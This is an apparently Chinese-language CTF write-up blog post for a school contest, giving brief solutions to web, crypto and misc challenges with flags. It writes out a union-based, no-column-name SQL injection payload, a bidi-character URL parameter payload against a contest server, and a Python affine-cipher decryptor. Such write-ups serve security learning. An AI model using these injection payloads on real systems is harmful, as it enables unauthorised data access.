本菜鸡膜拜各位大佬

WEB

easyphp

参考链接：http://landasika.top/2022/03/31/nisactf_web%e9%a2%98%e8%a7%a3/

url转码不对，发现实际上get里面的参数不是password

payload：

http://121.40.176.232:8002/?username=admin&%E2%80%AE%E2%81%A6CTF%E2%81%A9%E2%81%A6password=%E2%80%AE%E2%81%A661d%E2%81%A9%E2%81%A661dctf

Simplest_php

参考链接
https://blog.csdn.net/zw05011/article/details/122437504
https://blog.csdn.net/weixin_43803070/article/details/91127706

本题利用PHP伪协议+extract变量覆盖

simple answer

<?php
include "flag.php";
highlight_file(__FILE__);
$my_var = $_GET['hack'];
set_error_handler(
    function() use(&$flag) {
        echo $flag;
    }
);$flag.=$my_var ;
?>

本题关键就是set_error_handler函数，指的是当PHP出错的时候，执行这个函数，那么只要上传一个错误的语法就行

easy_nodejs

js弱类型，类似于PHP数组绕过，参考虎符2021

middleSQLi

2333，一般performance_schema.threads有17列，但是这个只有14列，原来这个和服务器版本有关，本地跑的时候还一直报union查询的类型不匹配的错误，还以为传上去的时候是这个有问题呢，涨知识了233
union联合注入，无列名注入

1'union/**/select/**/mid(`11`,65,208)/**/from(select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14/**/union/**/select/**/*/**/from/**/performance_schema.threads/**/where/**/name/**/like'%connection%'/**/limit/**/1,1)t#

HackMe

这个java题，，，我电脑上没有java环境23333，搭建环境都花了4个多小时（原谅我之前写java题只分析，看看wp而已），而且用同样的payload，反弹shell反弹不到我的服务器QAQ。。。
参考sk1y师傅的博客：https://blog.csdn.net/RABCDXB/article/details/123886651

Crypto

HelloCrypto

exp

#!/usr/bin/env python
import string
dic = string.ascii_lowercase

a = [3,5,7,17,23]
b = [4,9,12,16,20,22]

assert(all(i < 26 for i in a))
assert(all(i < 26 for i in b))

data = open("./result.txt","rb").read().decode("utf-8")
assert(all(i in dic for i in data))

result = ""
for i in range(len(data)):
    p=ord(data[i]) - 97
    while not(p-b[i % len(b)]>0 and (p-b[i % len(b)])%a[i % len(a)]==0):
        p=p+26
        print(p)
    result +=chr((p-b[i % len(b)])//a[i % len(a)] + 97)
    print(result)
   # result += chr(((ord(data[i]) - 97) * a[i % len(a)] + b[i % len(b)]) % 26 + 97)
open("./data.txt","wb").write(result.encode())

MISC

EasyEncode

-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...../-..-.-/-..../.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/-..../....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/--.../-..-.-/...--/---../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/...--/---../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...../-..-.-/-..../.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...--/-..-.-/...--/...--/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/--.../-..-.-/...--/....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/-..../...--/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/...--/..---/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/-..../....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/-..../...../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/--.../-..-.-/...--/-..../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...../-..-.-/-..../.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/...--/--.../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...../-..-.-/...--/-..../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/...--/-..../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/...--/..---/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/...--/---../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/-..../...../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/...--/-..../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/...--/.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...../-..-.-/...--/--.../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...--/-..-.-/...--/...../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...--/-..-.-/...--/-----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/-..../....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...--/-..-.-/...--/...--/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/...--/----./-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/--.../-..-.-/-..../.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/...--/...--/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...--/-..-.-/...--/...--/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...../-..-.-/...--/.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/--.../-..-.-/...--/---../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/...--/..---/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/-..../....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/...--/....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/...--/-..../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/-..../....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/-..../-..-.-/-..../.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/-..../....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/--.../-..-.-/-..../.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/-..../....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/--.../-..-.-/-..../.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/-..../....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/--.../-..-.-/-..../.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/-..../....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/--.../-..-.-/-..../.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/-..../....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/--.../-..-.-/-..../.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/-..../....-/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...--/-..-.-/...--/-----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/...--/..---/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/...--/.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...../-..-.-/...--/.----/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/...--/...../-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/....-/-..-.-/...--/..---/-..-.-/...../-.-./-..-.-/--.../...../-..-.-/...--/-----/-..-.-/...--/-----/-..-.-/...--/...--/-..-.-/...--/----.

http://www.zhongguosou.com/zonghe/moersicodeconverter.aspx
摩斯密码，解密得到

5C75303035615C75303036645C75303037385C75303036385C75303035615C75303033335C75303037345C75303036635C75303036325C75303036645C75303034655C75303037365C75303035615C75303034375C75303035365C75303036365C75303036325C75303034385C75303034655C75303036365C75303036315C75303035375C75303033355C75303033305C75303034645C75303033335C75303034395C75303037615C75303036335C75303033335C75303035315C75303037385C75303036325C75303036645C75303036345C75303036365C75303034645C75303036615C75303034645C75303037615C75303034645C75303037615C75303034645C75303037615C75303034645C75303037615C75303034645C75303037615C75303034645C75303033305C75303034325C75303034315C75303035315C75303034355C75303034325C7530303339

https://tool.lu/hexstr/
转16进制：

\u005a\u006d\u0078\u0068\u005a\u0033\u0074\u006c\u0062\u006d\u004e\u0076\u005a\u0047\u0056\u0066\u0062\u0048\u004e\u0066\u0061\u0057\u0035\u0030\u004d\u0033\u0049\u007a\u0063\u0033\u0051\u0078\u0062\u006d\u0064\u0066\u004d\u006a\u004d\u007a\u004d\u007a\u004d\u007a\u004d\u007a\u004d\u007a\u004d\u0030\u0042\u0041\u0051\u0045\u0042\u0039

https://tool.chinaz.com/tools/unicode.aspx
Unicode编码

ZmxhZ3tlbmNvZGVfbHNfaW50M3Izc3QxbmdfMjMzMzMzMzMzM0BAQEB9

base64解密

flag{encode_ls_int3r3st1ng_2333333333@@@@}

真正的CTF选手

下载之后打开压缩包即可

签到

熊曰

EasyWAV

用记事本打开，之后翻到最下面，可以看到一堆重复的字符，复制下来就行了

flag{1t is s0 34sY t0 hide 1nf0rm4t10n 1nt0 W4V F1l3}

校赛题解

本菜鸡膜拜各位大佬

WEB

easyphp

Simplest_php

simple answer

easy_nodejs

middleSQLi

HackMe

Crypto

HelloCrypto

MISC

EasyEncode

真正的CTF选手

签到

EasyWAV

ctfshow XSS 316-333

[php知识点]PHP伪协议

Landasika

Comments | NOTHING

取消回复

❤️蓝桉已遇释槐鸟❤️